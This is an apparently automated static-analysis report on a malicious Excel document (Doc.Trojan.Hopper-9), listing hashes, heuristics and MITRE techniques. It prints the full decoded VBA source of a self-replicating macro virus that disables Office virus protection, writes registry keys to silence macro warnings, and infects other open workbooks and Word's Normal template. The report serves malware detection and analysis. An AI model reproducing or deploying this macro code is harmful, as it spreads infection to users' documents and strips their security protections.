Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a9d013c0a685103…

MALICIOUS

Office (OLE)

Size: 25.0 KB
Created: 1998-12-06 01:57:43
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 82d8945ec7898d54b1a2af75bcf60130
SHA-1: 892679a337e1c6a4e7dbb2ca948787b611bdf9ac
SHA-256: 3a9d013c0a685103bd3ecc620f18c0d60755760f7e52a9c613424629679d46cc
Risk Score: 320

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Excel document containing VBA macros. The macros utilize `WScript.Shell` and `CreateObject` to write registry keys, indicating an attempt to establish persistence. The `Workbook_Deactivate` subroutine explicitly writes to `HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6` and `HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6`. The presence of `Shell()` calls and `WScript.Shell` usage strongly suggests the execution of arbitrary commands or the download of further malicious content.

Heuristics (6)

  • ClamAV: Doc.Trojan.Hopper-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-9
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        On Error Resume Next
        Set WSHshell = CreateObject("WScript.Shell")
        WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        On Error Resume Next
        Set WSHshell = CreateObject("WScript.Shell")
        WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2957 bytes
SHA-256: 4c9ef587beae8bc9fc576298e3d9886d265d47a336ee948747ef198027b1ebed
Detection
ClamAV: Doc.Trojan.Hopper-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
Private Sub Document_Close()
    On Error Resume Next
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        For i = 1 To 19
            NT.InsertLines i, AD.Lines(i, 1)
        Next
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        For i = 1 To 19
            AD.InsertLines i, NT.Lines(i, 1)
        Next
    End If
End Sub
'Ex-cell v0.1 /1nternal
Private Sub Workbook_Deactivate()
    On Error Resume Next
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
    WSHshell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            For y = 1 To 45
                Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
            Next
        End If
    Next
    Set WordObj = CreateObject("Word.Application")
    Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        For i = 1 To 19
            NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
        Next
    End If
    Set NT = Nothing
    WordObj.Quit
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True